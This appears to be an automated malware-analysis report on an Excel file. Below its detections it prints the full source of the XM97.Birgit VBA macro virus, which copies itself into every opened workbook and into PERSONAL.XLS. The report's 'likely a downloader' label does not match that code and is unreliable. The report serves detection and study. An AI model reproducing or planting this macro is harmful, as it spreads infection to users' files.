MALICIOUS
220
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file is an Excel document containing VBA macros, including an Auto_Open subroutine, which is a common technique for executing malicious code upon file opening. The presence of the 'XM97.Birgit' macro suggests a known malware pattern, though a specific family could not be definitively identified. The script's intent is to run malicious code, likely a downloader, upon execution.
Heuristics 4
-
ClamAV: Xls.Trojan.MVTK-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Trojan.MVTK-1
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Auto_Open macro high OLE_VBA_AUTOAuto_Open macro
-
Auto_Close macro high OLE_VBA_AUTOCLOSEAuto_Close macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2638 bytes |
SHA-256: 507bb285164afbb0fa996d5fc4bcae158b043d434497ae36a7e583abca8fd521 |
|||
|
Detection
ClamAV:
Xls.Trojan.MVTK-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "DieseArbeitsmappe"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Tabelle1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Tabelle2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Tabelle3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Birgit"
Sub Auto_Open()
' -= [zWeiBLuM´s Macro Virii Terror Kit] =-
' -= [XM97.Birgit] =-
' -= [ID: 23971-Tx-7977996-Tp.X] =-
Application.OnSheetActivate = "SeL8789"
End Sub
Sub SeL8789()
On Error Resume Next
BpTlRn7566 = "Birgit"
GlHfNg8789 = "PERSONAL.XLS"
CfMwVq7977 = Application.StartupPath & "\" & GlHfNg8789
ClSqPi6209GlHfNg996 = 0
UfShJx8789BpTlRn7977 = 0
With Application
.StatusBar = "XM97.Birgit"
.ScreenUpdating = False
.DisplayAlerts = False
.EnableCancelKey = xlDisabled
End With
If Day(Now()) = 19 Then
MsgBox "Birgit or not?", vbOkOnly, "Birgit"
Assistant.Visible = True
With Assistant.NewBalloon
.Text = "Sniff... sniff... I'm ill...."
.Heading = "Sorry... infected by Birgit"
.Show
End With
Assistant.Visible = False
End If
Application.VBE.ActiveVBProject.VBComponents.Item(BpTlRn7566).Export "C:\WINDOWS\SYSTEM\Birgit.sys"
If Dir(CfMwVq7977) = GlHfNg8789 Then UfShJx8789BpTlRn7977 = 1
For x = 1 To ActiveWorkbook.VBProject.VBComponents.Count
If ActiveWorkbook.VBProject.VBComponents(x).Name = BpTlRn7566 Then ClSqPi6209GlHfNg996 = 1
Next x
If ClSqPi6209GlHfNg996 = 0 Then
ActiveWorkbook.VBProject.VBComponents.Import "C:\WINDOWS\SYSTEM\Birgit.sys"
ActiveWorkbook.Save
End If
If UfShJx8789BpTlRn7977 = 0 Then
Workbooks.Add.SaveAs FileName:=CfMwVq7977
ActiveWorkbook.VBProject.VBComponents.Import "C:\WINDOWS\SYSTEM\Birgit.sys"
ActiveWindow.Visible = False
Workbooks(GlHfNg8789).Save
End If
End Sub
Sub Auto_Close()
Application.OnSheetActivate = "SeL8789"
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.